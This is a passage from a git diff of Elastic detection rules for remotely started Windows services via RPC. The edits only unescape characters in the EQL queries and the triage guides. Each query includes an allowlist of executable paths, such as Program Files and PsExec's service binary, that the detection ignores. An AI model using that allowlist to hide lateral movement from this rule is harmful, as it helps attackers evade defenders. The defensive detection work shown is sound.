vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e= 49152 and destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", "references": [ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f" ], @@ -113,7 +113,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_106.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_106.json index a645daeefe8..75b7c86e9c9 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_106.json +++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_106.json @@ -13,8 +13,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e= 49152 and destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", "references": [ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f" ], @@ -112,7 +112,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_107.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_107.json index dce684546e9..271168e5ddb 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_107.json +++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_107.json @@ -13,8 +13,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e= 49152 and destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager 